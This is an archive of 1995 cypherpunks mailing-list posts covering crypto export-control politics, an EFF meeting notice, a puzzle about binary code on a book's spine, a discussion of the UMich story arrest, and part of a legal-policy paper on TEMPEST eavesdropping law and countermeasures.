*  Fax: (317) 780-5209                 Orders (Visa/MC) 1-800-749-9939   *    
*  Internet:  Lindat@iquest.net
*
*******************************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: news@visionware.co.uk (Visionware News)
Date: Sat, 11 Feb 95 03:46:02 PST
To: cypherpunks@toad.com
Subject: automatic reply to test posting (lwall)
Message-ID: <9502111145.AA16693@wol.visionware.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



STOP!  Before you panic, read this message through to the end.

This message has been sent to you because you have posted an article to
one of the Usenet test groups (eg alt.test), and it arrived here at
Visionware (visionware.co.uk) on Sat 11 Feb, 11:44 GMT.

If you have not posted an article to one of these groups, then it is
possible that someone else did so while pretending to be you.  If you
are sure that this is the case then ask your Local Help Desk to help
you track down the perpertrator.  It is not possible to track down
forgeries from this site.

Many people like to see copies of the articles that they post, so that
they can see how far (and how quickly) their message has been
transmitted.  Accordingly, you will get at most one email message from
Visionware for each article you post to a *.test newsgroup.  You have
*not* been added to a subscription list.

It is not possible to stop the replies to other messages you may have
already posted, but in FUTURE POSTINGS you can prevent this
autoresponder from replying to you by including a phrase like "don't
reply" or "ignore this message".

This site, visionware.co.uk, is located at Visionware Ltd., which is in
lovely Leeds, West Yorkshire, England (53 48 34 N / 01 34 51 W).

In case you want to know, we're running INN 1.4sec.

We deliberately receive the 'ba' (Bay Area) distribution; this is for
our staff working from Menlo Park CA.


Feel free to send your comments, suggestions, and questions regarding
this auto-reply daemon to the administrator,
postmaster@visionware.co.uk (telephone +44 113 251-2000 and ask for the
System Administrator).  You should get a response to email within a day
or so; if not, then your message has probably not arrived.


Your article, as received here, follows:
> Path: visionware.co.uk!pipex!howland.reston.ans.net!agate!overload.lbl.gov!emf.emf.net!hilbert.dnai.com!nbn!miwok!news.zeitgeist.net!ack.berkeley.edu!not-for-mail
> Subject: lwall
> Message-ID: <PINE4545-dhfsdkjc@ack.berkeley.edu>
> NNTP-Posting-Host: ack.berkeley.edu
> Organization: cypherpunks
> Lines: 2
> From: cypherpunks@toad.com
> Distribution: world
> Newsgroups: alt.test
> Date: 6 Feb 1995 19:34:19 GMT
> 
> test
> test
-- 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Banisar <tc@phantom.com>
Date: Sat, 11 Feb 95 09:14:07 PST
To: Rhys Kyraden <Jaeson.M.Engle@josaiah.sewanee.edu>
Subject: Re: S314 and potential hell-raising
In-Reply-To: <v0151011cab5f38526c94@[152.97.12.101]>
Message-ID: <Pine.3.89.9502111208.C13529-0100000@mindvox>
MIME-Version: 1.0
Content-Type: text/plain



 
The ACLU (aslong with us and numerous other groups) are all very aware of 
S. 314. I briefed the Telecommunications policy Roundtable, which is over 
100 public interest groups interested in telecom policy, about it last 
week and we are all gearing up to nail this sucker to the wall before it 
is included in  the telecom bill. If you havent called and screamed at 
your senator and congresscritter, do so now already (202) 224-3121.

-d





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Barrett <barrett@daisy.ee.und.ac.za>
Date: Sat, 11 Feb 95 03:16:37 PST
To: Rich Salz <rsalz@osf.org>
Subject: Re: Bernstein
In-Reply-To: <9502110534.AA15867@sulphur.osf.org>
Message-ID: <Pine.NEB.3.91.950211130522.23367d-100000@daisy.ee.und.ac.za>
MIME-Version: 1.0
Content-Type: text/plain


> djb@silverton wrote a few crypto thinks, including a cute modification
> of the snefru hash that turned it into a crypto scheme called shuffle.
> my guess is that he put it out on the net for ftp...

I don't think Dan Bernstein made shuffle available, but he did get into a
fight with various branches/departments/agencies of the US government
about his right to publish it.

--apb (Alan Barrett)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rick H. Wesson" <wessorh@ar.com>
Date: Sat, 11 Feb 95 13:49:58 PST
To: cypherpunks@toad.com
Subject: "Being Digital" spinde
Message-ID: <199502112143.NAA03166@ar.com>
MIME-Version: 1.0
Content-Type: text/plain


I thought you guy's would enjoy this...

I found out Nicholas Negroponte, the author of 
"being Digital" encoded a message in the spine of the book
all ones and zeros. It's a decent book, and not 
much about crypto except for the spine. 

I made a text file mof the 1260 bits on the spine.

a sample perl script is included to grab the bits.

Next mont's issue of wired is supposed to have 
a discussion about the spine and the encrypted messages.

the only hint I've got is:
   000 000 111

I know how you guys love this stuff, he says it's 
(the code) is unbreakable...

-Rick


========================= Cut Here ==========================
begin 644 bd.tar.gz
M'XL("%HL/2\``V)D+G1A<@#M5E%OVS80]FOX*VYQ@+9`9Y&6:6W(NCUM0X"A
M#WL;NJV0+#H6HDB"*,,-ANVWC^3=41Z&[LT9T/(+8H>ZTW=WW]T1J>IL<6G`
M1A9:PP(`U`:_0:WQ&R$!=*&*]7JKUKDSREQO%Z`OGIG#T4[E"+`X&6O[\?!1
M/^>VWS]'0L^+JLZJ>C6TEXRAY'_W?UW$_NLBWSJCR@NY`'G)I!B?>?^77V1'
M.V9MORO;K&JZ;#!C*X1OR\T/=S]]#V_@V@U(74[7M^%I/YCNI;>\NA7BZJ:R
MWH-LIT/3FI??>.NWK_X05YWY,$&SA^SW97:+SJLW</,>O?_$*)[A+[#9KUV6
M/=ZC:=?VUG`4_P`S&L:FF_P;M^+_UNU3`>Z_:^\%8[C]WVXV']W_/-=KWO^\
MV$B__SHOTOX_!Y9B"?NQ?X3I8,`.36>@W[N5-TUW#W5SWTQE>PW5$[QM=H>^
M+2V\-?=C/_236;E7`9H)1E.V3S`TUAH+CYY@[ZX"T\$=',H:IA[JWO$W%J93
MLS.K%;[Y2W]T&]V755FYUT^E6VWGNCN8W4/P?@UWDP53VB?_?!K+S@[N6@BV
M0&"GXWZ_@A_'_CB8&IK.3U7E$^I/[FWMOZ%R5]N#.ZGU5GJCQ>!7[UQ1D\NW
M[KL7$YSZ\>&UTL5*X^/OX+?@]N7/S>Y!+/T/:"&5DFZ8PX=PO^Y/%1X)&4XR
M6-D2CB*X*#PZ$O^$'=TS@>\K-!,U4RI%)"JX<73/H@4:Z0DE$CR$8G:%P2@$
MICQ3+F&-09`%BY@/S.\A,$>L2A!%^/(LFL)CF501%:%8(L6Z<,HLDL)<<BDD
MRR2Q8"*B\BA3;^$\HV(8SK-H,8=0F+>D0(*K42PHIR#4G*1GV9#XL[JLHI*Q
MB)D?_6;=)>JR";EPWF=2^"(XME+_5!=UX1A^Z*3@#N(XL6K>5_ZK+5@$L=#9
MLV@115&2IH+JB(*&(KB5;(GSXUBV..<\%W&VL`A.9!X1*H*[JK!'6RVBV-1/
MCLZ=X$['),_+PWDI:(^H$C938G%;@M1Q5<Y&$',I-(@H&D9ADMA0/`EVB6--
M%I_,5SQ<M'3Q`I@/5#XUC,8Z*H\L6K":9(["D?#T(7@@%.TF#5`HZ6MYM@*2
M#UQ$7)=0'@^,I'6G9#R+GFM4?&?Q;<`33[EP'^39;JHP=DK&Q&E%J+5*\@J>
MC?(\A(H74A*-IHGE^L_O#LG7)(U!U.;\"E,B_<>8D)"0D)"0D)"0D)"0D)"0
3D)"0D)"0D/"9X&_^(G<;`"@``(U!
`
end




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jtender@telerama.lm.com (John Tender)
Date: Sat, 11 Feb 95 11:12:23 PST
Subject: Re:       Re: Laws, Feds, & the Internet
Message-ID: <3hj262$32m@africa.lm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Richard F. Dutcher" <rfdutcher@igc.apc.org> writes:

> They *do* have to prove intent -- as to how, that's what juries are 
> for.  BTW, he used her real name in the post, with no disclaimers 
> about fiction.  From what I have heard, if he had said the same thing 
> in her presence, he could have been arrested for assault.
> 
> So is saying something that would be actionable in a public space
> also actionable in a public cyberspace?  I dunno, and neither does
> anyone else.  But it's a well-established principle that a threat is 
> a shout of "Fire!" in a crowded theater.

How do you know what was in the original post?
Can you post a copy here?


-- 
JT                            "From the purlieus of Pittsburgh"      
jtender@telerama.lm.com      
"Everything must GO"
   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jtender@telerama.lm.com (John Tender)
Date: Sat, 11 Feb 95 11:12:33 PST
Subject: Re:       Re: Laws, Feds, & the Internet
Message-ID: <3hj26d$32o@africa.lm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Richard F. Dutcher" <rfdutcher@igc.apc.org> writes:

> They *do* have to prove intent -- as to how, that's what juries are 
> for.  BTW, he used her real name in the post, with no disclaimers 
> about fiction.  From what I have heard, if he had said the same thing 
> in her presence, he could have been arrested for assault.

How do yopu know the content of the original post?
Can you post it here?




-- 
JT                            "From the purlieus of Pittsburgh"      
jtender@telerama.lm.com      
"Everything must GO"
   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andre Bacard <abacard@well.sf.ca.us>
Date: Sat, 11 Feb 95 15:43:45 PST
To: cypherpunks@toad.com
Subject: Feb 15th Meeting About PGP
Message-ID: <199502112343.PAA13759@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
The Electronic Frontier Foundation <info@eff.org> will meet on
Wednesday, February 15th at the WIRED magazine <info@wired.com>
office in San Francisco. John Gilmore and Cindy Cohn will discuss
the constitutional implications of export controls on cryptography.
This topic relates directly to PGP.
 
Attached you'll discover complete details about this meeting --
which I've borrowed from the EFFector, EFF's online newsletter. I
hope to see you Wednesday!
 
***************************************************************
Andre Bacard,              Bacard wrote "The Computer Privacy
Stanford, California       Handbook: A Practical Guide to E-Mail
abacard@well.com           Encryption, Data Protection, and PGP
                           Privacy Software" [for novices/experts].
 
Introduction by Mitchell Kapor, co-Founder of Electronic Frontier
Foundation and creator of Lotus 1-2-3.
 
          +++ Book forthcoming. Write for details. +++
*****************************************************************
 
 
Subject: EFF SF Bay Area Meetings Announced
- -------------------------------------------
 
EFF is pleased to introduce a series of monthly `BayFF' meetings in
the San Francisco Bay Area.  All EFF members, guests, and the
public are invited.
 
The first meeting will be in San Francisco on February 15, 1995, at
7:30PM.  The gracious donor of our first meeting place is:
 
        Wired Magazine
        520 Third Street, Fourth Floor
        San Francisco, CA
        +1 415 222 6200  voice
 
John Gilmore and Cindy Cohn will speak on the constitutional issues
around export controls on cryptography.  John is a co-founder of
EFF and Chair of the EFF Board's Crypto Committee.  Cindy is an
attorney in private practice at McGlashen and Sarrail in San Mateo. 
These controls inhibit free speech, publication of software and
papers, academic freedom of inquiry, and personal privacy, as well
as having a strong negative impact on computer security.  We'll
explore some of the implications and prospects for change.
 
Dave Farber will speak on "Living in the Global Information
Infrastructure -- some concerns".  Dave is an EFF Board member and
has more years of experience in computers and networking than the
total experience at many startup companies.  Vice President Gore
has proposed that the nations of the world undertake the building
of a Global Information Infrastructure -- the GII.  While most
leaders agree with the sprit of the Gore proposal -- namely to
provide a mechanism which could invigorate the world economy in the
forthcoming information age, many disagree with his belief that it
will bring democracy to the world.  They interpret such statements
as being another example of American colonialism.  It is this basic
lack of uniform global agreement on what terms mean, what rules
apply to electronic commerce and what impact a GII will have on
their nation that underlies the comments Dave will make.  These
raise questions about the universality of Cyberspace.  He will seek
to table a set of questions that may  stimulate your thinking in
this area.
 
There will also be plenty of time for general and specific
questions, issues, discussion, meeting people, and socializing with
frontier- minded folks.
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.7
 
iQCVAwUBLz04Y96pT6nCx/9/AQF4CQP9EsOJdzn75G+5mG73nX/URpina5K58rIW
marI385hS/66wqMDNlsRZ3d8VxCAFp7SPgO7XiajMMrNDTPEpAQjvqU233R2k3aP
Yk19xNnIKisL8rBTmNw0r8eoH8dI+4/XqnDP3GOmf2nTq9Y/P9hVwtVqH9vpCaVD
CjloHxczOwY=
=4imy
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@nately.UCSD.EDU (Anonymous)
Date: Sat, 11 Feb 95 16:37:02 PST
To: cypherpunks@toad.com
Subject: TEMPEST Paper by Former Civilian (2/2)
Message-ID: <9502120040.AA14089@nately.UCSD.EDU>
MIME-Version: 1.0
Content-Type: text/plain



                                IV. CANADIAN LAW
               Canada has taken direct steps to limit eavesdropping on
          computers.    The Canadian  Criminal  Amendment Act  of 1985

          _____________________              

          22.  Interception of Communications Act 1985    1, Prohibition on
          Interception:
               (1) Subject to the  following provisions of this section,  a
               person who  intentionally intercepts a communication  in the
               course of its  transmission by post or by  means of a public
               telecommunications system shall be guilty  of an offence and
               liable--
                    (a) on summary  conviction, to a fine not exceeding the
                    statutory maximum;
                    (b) on conviction on indictment,  to imprisonment for a
                    term not exceeding two years or to a fine or to both.
               ***

          23.  Tapping  (aka  trespassatory eavesdropping)  is  patently in
          violation  of the statute.  "The  offense created by section 1 of
          the Interception of Communications Act 1985 covers those forms of
          eavesdropping on computer communications  which involve "tapping"
          the wires along  which messages  are being passed.   One  problem
          which  may  arise,  however,  is  the  question  of  whether  the
          communication in question  was intercepted in  the course of  its
          transmission by  means of a public telecommunications system.  It
          is technically possible  to intercept a communication  at several
          stages in its transmission,  and it may be a question  of fact to
          decide the stage  at which it enters the "public" realm.  THE LAW
          COMMISSION,WORKING PAPER NO. 110: COMPUTER MISUSE,  3.30 (1988). 

          24.  "There are  also forms of  eavesdropping which the  Act does
          not cover.  For  example. eavesdropping on a V.D.U.  [referred to
          in  this text as a CRT] screen  by monitoring the radiation field
          which surrounds it  in order to  display whatever appears on  the
          legitimate  user's  screen on  the  eavesdropper's screen.   This
          activity would not  seem to  constitute any criminal  offence..."
          THE LAW COMMISSION, WORKING PAPER NO. 110: COMPUTER MISUSE,  3.31
          (1988).

<New Page>
          criminalized indirect access  to a computer service.[25]   The
          specific reference  to an  "electromagnetic device"  clearly
          shows the intent  of the legislature  to include the use  of
          TEMPEST ELINT equipment within the ambit of the legislation.
               The limitation of obtaining "any computer service" does
          lead to  some confusion.   The Canadian legislature  has not
          made  it  clear  whether  "computer  service"  refers  to  a
          computer  service  bureau  or  merely   the  services  of  a
          computer.    If  the  Canadians  had  meant  access  to  any
          computer,  why  did they  refer  to any  "computer service".
          This   is   especially   confusing   considering   the   al-
          encompassing language  of (b)  'any function  of a  computer
          system'.
               Even   if   the   Canadian   legislation   criminalizes
          eavesdropping  on  all  computers,  it  does not  solve  the
          problem  of  protecting  the privacy  of  information.   The
          purpose  of  criminal law  is  to control  crime.[26]   Merely
          making  TEMPEST  ELINT  illegal will  not  control  its use.
          First, because  it  is an  inherently  passive crime  it  is
          impossible to detect and hence punish.  Second, making  this
          form of  eavesdropping  illegal without  taking a  proactive
          stance  in  controlling  compromising emanations  gives  the
          public a false sense of security.   Third, criminalizing the
          possession of a TEMPEST ELINT  device prevents public sector
          research into countermeasures.   Finally,  the law will  not
          prevent eavesdropping on private information held in company
          computers unless  disincentives are given for companies that
          do not take sufficient precautions against eavesdropping and
          simple, more common, information crimes.[27]
          _____________________              

          25.   301.2(1) of the  Canadian criminal code states  that anyone
          who:

          ... without color of right,
          (a) obtains, directly or indirectly, any computer service,
          (b)  by  means  of  an  electromagnetic  ...   or  other  device,
          intercepts  or  causes  to  be  intercepted, either  directly  or
          indirectly, any function of  a computer system ... [is  guilty of
          an indictable offence].

          26.  UNITED   STATES   SENTENCING   COMM'N,  FEDERAL   SENTENCING
          GUIDELINES MANUAL (1988) (Principles  Governing the Redrafting of
          the Preliminary Guidelines "g." (at an unknown page)) 

          27.  There has been great debate over  what exactly is a computer
          crime.    There  are  several  schools  of  thought.    The  more
          articulate school, and the one to  which the author adheres holds
          that  the category  computer crime  should be  limited to  crimes
          directed against computers; for example, a terrorist destroying a
          computer  with explosives would fall into  this category.  Crimes
          such as  putting  ghost  employees  on  a  payroll  computer  and

<New Page>

                                  V. SOLUTIONS
               TEMPEST ELINT  is passive.   The  computer or  terminal
          emanates  compromising radiation which is intercepted by the
          TEMPEST device  and reconstructed  into useful  information.
          Unlike conventional  ELINT there  is no  need to  physically
          trespass or even come near the target.  Eavesdropping can be
          performed from a nearby office or even a van parked within a
          reasonable distance.   This means  that there is  no classic
          scene of the crime; and little or  no chance of the criminal
          being discovered in the act.[28]  
               If the crime is discovered it will be ancillary to some
          other  investigation.    For example,  if  an  individual is
          investigated for insider  trading a search of  his residence
          may yield a TEMPEST ELINT device.   The device would explain
          how the defendant was obtaining  insider information; but it
          was the insider trading, not the  device, that gave away the
          crime.
               This  is  especially  true  for illegal  TEMPEST  ELINT
          performed by the state.  Unless the perpetrators are  caught
          in the act  there is  little evidence  of their  spying.   A
          trespassatory bug can be detected and located; further, once
          found it provides tangible evidence that a crime took place.
          A TEMPEST ELINT device by its inherent passive nature leaves
          nothing to detect.   Since the government is less  likely to
          commit an ancillary crime which might be detected there is a
          very small chance  that the spying will  ever be discovered.
          The  only way to  prevent eavesdropping is  to encourage the
          use of  countermeasures: TEMPEST  Certified[29] computers  and
          _____________________              
                                                                           
          collecting their pay are merely  age-old accounting frauds; today
          the  fraud involves a computer because  the records are kept on a
          computer.  The  computer is merely ancillary to  the crime.  This
          has been mislabeled  computer crime and should merely be referred
          to as a fraud perpetrated with  the aid of a computer.   Finally,
          there are information  crimes.  These  are crimes related to  the
          purloining or  alteration of information.  These  crimes are more
          common and more profitable due to  the computer's ability to hold
          and access great amounts of information.   TEMPEST ELINT can best
          be categorized as a information crime.

          28.  Compare, for  example, the  Watergate breakin  in which  the
          burglars  were discovered  when they  returned to  move  a poorly
          placed spread spectrum bug.

          29.  TEMPEST Certified refers  to the  equipment having passed  a
          testing and  emanations regime specified  in NACSIM 5100A.   This
          classified document sets forth the emanations levels that the NSA
          believes digital equipment can give  off without compromising the
          information it  is processing.   TEMPEST  Certified equipment  is
          theoretically secure against TEMPEST eavesdropping.  

<New Page>
          terminals.
               In merely making  TEMPEST ELINT  illegal the public  is
          given the  false impression  of security;  they lulled  into
          believing  the  problem  has been  solved.    Making certain
          actions illegal does not prevent them  from occurring.  This
          is  especially  true  for  a  TEMPEST  ELINT  because it  is
          undetectable.  Punishment is an empty  threat if there is no
          chance of being  detected; without detection there can be no
          apprehension and conviction.   The only way  to prevent some
          entity  from eavesdropping  on  one's  computer or  computer
          terminal is  for the equipment not to  give off compromising
          emanation; it must be TEMPEST Certified.
               The United  States can solve  this problem by  taking a
          proactive  stance on compromising  emanations.  The National
          Institute of Standards and Technology  (NIST[30]) is in charge
          of  setting  forth standards  of  computer security  for the
          private  sector.   NIST  is  also charged  with  doing basic
          research to advance the art of computer security.  Currently
          NIST does not discuss TEMPEST with  the private sector.  For
          privacy's sake,  this policy must be changed  to a proactive
          one.  The NIST should publicize  the TEMPEST ELINT threat to
          computer  security and  should set  up a  rating system  for
          level  of  emanations  produced   by  computer  equipment.[31]
          Further,  legislation  should  be  enacted  to  require  the
          labeling  of  all computer  equipment    with  its level  of
          emanations and whether it is TEMPEST Certified.  Only if the
          public  knows of the  problem can it begin  to take steps to
          solve it.
               Title III makes  possession of a surveillance  device a
          crime,  unless  it   is  produced  under  contract   to  the
          government.  This means that  research into surveillance and
          counter-surveillance   equipment   is  monopolized   by  the
          government and a  few companies working under  contract with
          _____________________              
                                                                           
               NACSIM 5100A is  classified, as are all  details of TEMPEST.
          To  obtain  access to  it, contractor  must  prove that  there is
          demand within  the government for the specific  type of equipment
          that intend to  certify.  Since  the standard is classified,  the
          contractors can not sell the equipment to non-secure governmental
          agencies or the public.  This prevents reverse engineering of the
          standard  for its physical  embodiment, the  Certified equipment.
          By  preventing  the   private  sector  from  owning   this  anti-
          eavesdropping equipment,  the NSA has  effectively prevented  the
          them from protecting the information in their computers. 

          30.  Previously the Bureau of Standards.   The NIST is a division
          of the Commerce Department.

          31.  In this case computer equipment would include all peripheral
          computer equipment.  There is no use is using a TEMPEST Certified
          computer if the printer or the modem are not Certified.

<New Page>
          the government.   If TEMPEST eavesdropping  is criminalized,
          then possession of TEMPEST ELINT equipment will be criminal.
          Unfortunately,this  does  not  solve the  problem.    Simple
          TEMPEST ELINT  equipment is easy  to make.   For just  a few
          dollars  many  older  television  sets  can be  modified  to
          receive and  reconstruct  EMR.    For less  than  a  hundred
          dollars a more  sophisticated TEMPEST ELINT receiver  can be
          produced[32].  
               The  problem  with  criminalizing  the  possession   of
          TEMPEST ELINT equipment is  not just that the law  will have
          little effect on the use of such equipment, but that it will
          have a  negative effect  on counter-measures  research.   To
          successfully   design   counter-measures  to   a  particular
          surveillance  technique  it  is  vital  to have  a  complete
          empirical  understanding   of  how  that   technique  works.
          Without  the right  to  legally manufacture  a  surveillance
          device there is no possible way for a researcher to have the
          knowledge to  produce an effective  counter-measures device.
          It  is  axiomatic:  without  a  surveillance device,  it  is
          impossible to test a counter-measures device.  
               A number of  companies produce  devices to measure  the
          emanations from electrical equipment.  Some of these devices
          are  specifically   designed  for   bench  marking   TEMPEST
          Certified equipment.  This does not  solve the problem.  The
          question  arises:  how   much  radiation  at   a  particular
          frequency  is compromising?  The  current answer is to refer
          _____________________              

          32.  The  NSA  has tried  to  limit the  availability  of TEMPEST
          information to prevent the spread of the devices.
               For a discussion of the  First Amendment and prior restraint
          See, e.g. The United  States of America v. Progressive,  Inc. 467
          F.Supp 990 (1979, WD Wis.)(magazine intended to publish plans for
          nuclear  weapon; prior  restraint injunction  issued),  reh. den.
          United States v. Progressive  Inc. 486 F.Supp 5 (1979,  WD Wis.),
          motion  den  Morland  v. Sprecher  443  US  709 (1979)(mandamus),
          motion denied  United States  v. Progressive,  Inc. 5  Media L  R
          (1979, 7th Cir.), dismd. without op. U.S. v. Progressive, Inc 610
          F.2d 819 (1979, 7th Cir.); New York Times, Co. v.  United States,
          403  U.S.  713 (1971)(per  curium)(Pentagon Papers  case: setting
          forth prior  restraint standard  which government  was unable  to
          meet); T.  EMERSON, THE SYSTEM  OF FREEDOM OF  EXPRESSION (1970);
          Balance  Between Scientific  Freedom  and  NAtional Security,  23
          JURIMETRICS  J. 1  (1982)(current  laws and  regulations limiting
          scientific and  technical expression exceed the  legitimate needs
          of national security); Hon. M.  Feldman, Why the First  Amendment
          is not Incompatible  with National Security, HERITAGE  FOUNDATION
          REPORTS (Jan.  14, 1987).  Compare Bork,  Neutral Principles  and
          Some First Amendment Problems,  47 IND. L. J. 1  (First Amendment
          applies only to  political speech); G.  Lewy, Can Democracy  Keep
          Secrets, 26  POLICY REVIEW 17  (1983)(endorsing draconian secrecy
          laws mirroring the English system).

<New Page>
          to NACSIM  5100A.   This document  specifies the  emanations
          levels suitable  for Certification.   The  document is  only
          available  to United  States  contractors having  sufficient
          security  clearance  and  an  ongoing  contract  to  produce
          TEMPEST Certified computers  for the  government.   Further,
          the correct levels are specified by the NSA and there  is no
          assurance that, while these levels are sufficient to prevent
          eavesdropping by unfriendly operatives,  equipment certified
          under NACSIM  5100A will have  levels low enough  to prevent
          eavesdropping by the NSA itself.
               The  accessibility  of  supposedly  correct  emanations
          levels  does  not solve  the  problem of  preventing TEMPEST
          eavesdropping.     Access   to  NACSIM   5100A   limits  the
          manufacturer to selling the equipment  only to United States
          governmental  agencies  with  the  need  to  process  secret
          information.[33]  Without  the right to possess  TEMPEST ELINT
          equipment  manufacturers  who  wish to  sell  to  the public
          sector cannot determine what a  safe level of emanations is.
          Further  those  manufacturers with  access  to  NACSIM 5100A
          should  want  to  verify that  the  levels  set  out in  the
          document are, in  fact, low enough to  prevent interception.
          Without an actual  eavesdropping device with which  to test,
          no   manufacturer  will   be   able  to   produce  genuinely
          uncompromising equipment.

               Even if the  laws allow ownership of  TEMPEST Certified
          equipment by the public, and even  if the public is informed
          of  TEMPEST's   threat  to  privacy,   individuals'  private
          information will not necessarily  by protected.  Individuals
          may  choose to  protect their  own information on  their own
          computers.  Companies  may choose  whether to protect  their
          own  private  information.    But  companies that  hold  the
          private information of  individuals must  be forced to  take
          steps to protect that information.
               In  England  the  Data  Protection  Act 1984[34]  imposes
          sanctions   against   anyone   who   stores   the   personal
          information[35] on  a computer  and fails  to take  reasonable
          _____________________              

          33.  For  example, the  NSA has  just recently  allowed the  Drug
          Enforcement Agency (DEA) to  purchase TEMPEST Certified  computer
          equipment.    The DEA  wanted  secure computer  equipment because
          wealthy  drug   lords  had   were  using   TEMPEST  eavesdropping
          equipment.

          34.  An  Act  to  regulate  the  use of  automatically  processed
          information relating to individuals and the provision of services
          in respect of such information.
               -Data Protection Act 1984, Long Title.

          35.  "Personal data"  means data consisting  of information which
          relates to a  living individual who  can be identified from  that

<New Page>
          measures to prevent disclosure of that information.  The act
          mandates  that  personal  data  may  not  be  stored  in any
          computer  unless  the  computer bureau  or  data  user[36] has
          registered under the  act.[37]    This provides for a  central
          registry  and  the tracking  of  which companies  or persons
          maintain databases of personal information.   Data users and
          bureaux must  demonstrate a  need and  purpose behind  their
          possession of personal data.
               The act  provides tort  remedies to  any person  who is
          damaged by disclosure  of the  personal data.[38]   Reasonable
          care to  prevent the  disclosure  is a  defense.[39]   English
          _____________________              
                                                                           
          information (or from that and other information in the possession
          of the data user), including any  expression of opinion about the
          individual but not any  indication of the intentions of  the data
          user in respect of that individual.
               -Data Protection Act 1984   1(3)

          36.  "Data user" means  a person  who holds data,  and a  persons
          "Holds" data if --
               (a) the data form part of a collection of  data processed or
               intended to be  processed by or on behalf  of that person as
               mentioned in  subsection (2) above; [subsection  (2) defines
               "data"] and
               (b) that person (either  alone or jointly or in  common with
               other persons)  controls the  contents and  use of  the data
               comprised in the collection; and
               (c) the data are in the form in which  they have been or are
               intended to be processed as mentioned in paragraph (a) above
               or (though not  for the time being  in that form) in  a form
               into which they have been converted after being so processed
               and  with  a  view  to  being  further  so  processed  on  a
               subsequent occasion.
               - Data Protection Act   1(5).

          37.  Data Protection Act 1984,   4,5.

          38.  An individual who is the subject of personal data held  by a
          data user... and who  suffers damage by reason of  (1)(c) ... the
          disclosure of the  data, or  access having been  obtained to  the
          data without  such authority as  aforesaid shall  be entitled  to
          compensation from  the data  user... for any  distress which  the
          individual has  suffered  by  reason of  the  ...  disclosure  or
          access.
               - Data Protection Act 1984   23.

          39.  ... it shall  be a defense to  prove that ... the  data user
          ...  had  taken  such  care  as  in  all  the  circumstances  was
          reasonably required  to prevent  the... disclosure  or access  in
          question.
               Data Protection Act 1984   23(3)

<New Page>
          courts  have not yet  ruled what level  of computer security
          measures  constitute  reasonable  care.     Considering  the
          magnitude of invasion possible with  TEMPEST ELINT it should
          be  clear  by now  that  failure  to use  TEMPEST  Certified
          equipment is prima facie unreasonable care.
               The Remedies section of the  act provides incentive for
          these  entities to provide  successful protection  of person
          data from disclosure  or illicit access.  Failure to protect
          the data will  result in monetary loss.  This  may be looked
          at from the economic efficiency  viewpoint as allocating the
          cost  of  disclosure the  persons  most able  to  bear those
          costs, and also most able to prevent disclosure.  Data users
          that  store   personal  data  would  use  TEMPEST  Certified
          equipment as part of their computer security plan, thwarting
          would-be eavesdroppers.  
               The Data Protection  Act 1984  allocates risk to  those
          who can  bear it best and provides  an incentive for them to
          keep other  individuals' data private.   This act  should be
          adopted by the United States as part of a full-spectrum plan
          to combat TEMPEST eavesdropping.  Data users are in the best
          position  to  prevent  disclosure  through  proper  computer
          security.    Only by  making  them  liable for  failures  in
          security can we begin to rein in TEMPEST ELINT.

                                       VII
                                 Recommendations
                 Do not  criminalize TEMPEST ELINT.   Most crimes that
          TEMPEST ELINT would aid, such a insider trading, are already
          illegal; the current laws are adequate.
                 The  National Institute of  Standards and  Technology
          should immediately begin  a program  to educate the  private
          sector about TEMPEST.  Only if  individuals are aware of the
          threat  can  they  take  appropriate precautions  or  decide
          whether any precautions are necessary.
                   Legislation  should  be   enacted  to  require  all
          electronic  equipment to  prominently display  its level  of
          emanations  and  whether  it  is   TEMPEST  Certified.    If
          individuals are to choose to protect themselves they must be
          able  to  make  a  informed   decision  regarding  how  much
          protection is enough.
                 TEMPEST  Certified equipment  should be available  to
          the private  sector.   The current  ban on  selling to  non-
          governmental  agencies  prevents  individuals  who  need  to
          protect information from having the technology to do so.
                 Possession of  TEMPEST ELINT equipment should  not be
          made  illegal.   The  inherently  passive nature  and simple
          design  of  TEMPEST ELINT  equipment  means that  making its
          possession illegal  will not deter  crime; the units  can be
          easily manufactured and are impossible  to detect.  Limiting
          their   availability   serves   only   to   monopolize   the
          countermeasures research, information, and equipment for the
          government;   this   prevents   the  testing,   design   and

<New Page>
          manufacture of counter-measures by the private sector.
                 Legislation mirroring  England's Data Protection  Act
          1984 should be  enacted.  Preventing disclosure  of personal
          data  can  only be  accomplished  by giving  those companies
          holding the data a reason to protect  it.  If data users are
          held liable for  their failure  to take reasonable  security
          precautions they  will  begin to  take  reasonable  security
          precautions,  including   the  use   of  TEMPEST   Certified
          equipment.

-------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
Due to the double-blind, any mail replies to this message will be anonymized,
and an anonymous id will be allocated automatically. You have been warned.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Sat, 11 Feb 95 13:41:12 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: UMich student arrested for rape story
In-Reply-To: <199502110403.UAA12629@mail.igc.apc.org>
Message-ID: <199502112143.QAA12769@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Rich Dutcher writes:
> They *do* have to prove intent -- as to how, that's what juries are 
> for.  BTW, he used her real name in the post, with no disclaimers 
> about fiction.  From what I have heard, if he had said the same thing 
> in her presence, he could have been arrested for assault.

Based on the NY Times article I've read, you're omitting some important
extenuating circumstances here. For one thing, it was apparently posted to
alt.sex.stories, which seems to obviate the use of "fictional" disclaimers.
Furthermore, he did _not_ identify her as a UMich student.

I don't see the relevance of "if he had said the same thing in her presence".
